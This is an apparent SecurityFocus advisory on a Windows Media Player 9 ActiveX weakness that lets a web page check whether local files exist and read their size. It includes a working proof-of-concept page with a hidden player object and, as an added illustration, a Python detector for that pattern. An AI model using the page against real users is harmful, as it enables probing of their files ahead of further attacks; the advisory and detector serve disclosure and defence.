source: https://www.securityfocus.com/bid/12032/info

The Windows Media Player ActiveX control is prone to a security weakness that may allow a malicious Web page to enumerate files that exist on the client computer.

This could aid in further attacks.

This issue is reported to affect Windows Media Player 9. The attack reportedly does not work on computers running Windows XP SP2 when it is executed from a remote source. This is likely due to additional browser security measures in Windows XP SP2.

<html><head><title>My Mortality</title></head><body>

<H1>Look at yourself and find the mortality of your body</H1>
<object style="display:none;"
        classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6"
        id="WindowsMediaPlayer">
  <param name="autoStart" value="0">
  <param name="mute" value="1">
</object>

<script>
var filePath = prompt("Enter the path of local file to check:","c:\\test.txt");
WindowsMediaPlayer.URL=filePath;
setTimeout(
  function(){
    ss=WindowsMediaPlayer.currentMedia.getItemInfoByAtom(19);
    if (ss!="")
      alert(filePath+" exist.\nThe file size is "+ss+" bytes. And you are surely vulnerable");
    else
      alert(filePath+" does not exist. Or you are not vulnerable");
  }
,100);
</script>

</body></html>
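
A content-inspection check for the pattern in the proof of concept above, as an added example that is not part of the original advisory or exploit file: it flags pages that embed the Windows Media Player control, assign its `URL` from script, and then read item metadata through `getItemInfoByAtom`. The names `scan_page` and `SAMPLE`, the constructed sample page, and the heuristic itself are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID of the Windows Media Player control, taken from the page's <object> tag.
WMP_CLSID = "6bf52a52-394a-11d3-b153-00c04f79faa6"

class _WmpScan(HTMLParser):
    """Collects ids of WMP <object> elements and the text of inline scripts."""
    def __init__(self):
        super().__init__()
        self.players = {}       # object id -> True when hidden with display:none
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
        elif tag == "object" and WMP_CLSID in a.get("classid", "").lower():
            style = a.get("style", "").replace(" ", "").lower()
            self.players[a.get("id", "")] = "display:none" in style

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def scan_page(html):
    """Return one finding per WMP object whose URL is set by a script that also reads item metadata."""
    p = _WmpScan()
    p.feed(html)
    p.close()
    js = "\n".join(p.scripts)
    reads_meta = re.search(r"currentMedia\s*\.\s*getItemInfoByAtom\s*\(", js) is not None
    findings = []
    for obj_id, hidden in p.players.items():
        # "<id>.URL =" is an assignment; (?!=) excludes == comparisons.
        pattern = r"\b%s\s*\.\s*URL\s*=(?!=)" % re.escape(obj_id)
        if obj_id and reads_meta and re.search(pattern, js):
            findings.append({"id": obj_id, "hidden": hidden})
    return findings

# Constructed sample mirroring the structure of the page's proof of concept.
SAMPLE = """<object style="display:none;" classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6" id="wmp"></object>
<script>wmp.URL = somePath; var s = wmp.currentMedia.getItemInfoByAtom(19);</script>"""
```

A page that only plays media through the control, without reading item metadata back, produces no finding, so the check keys on the combination rather than on the CLSID alone.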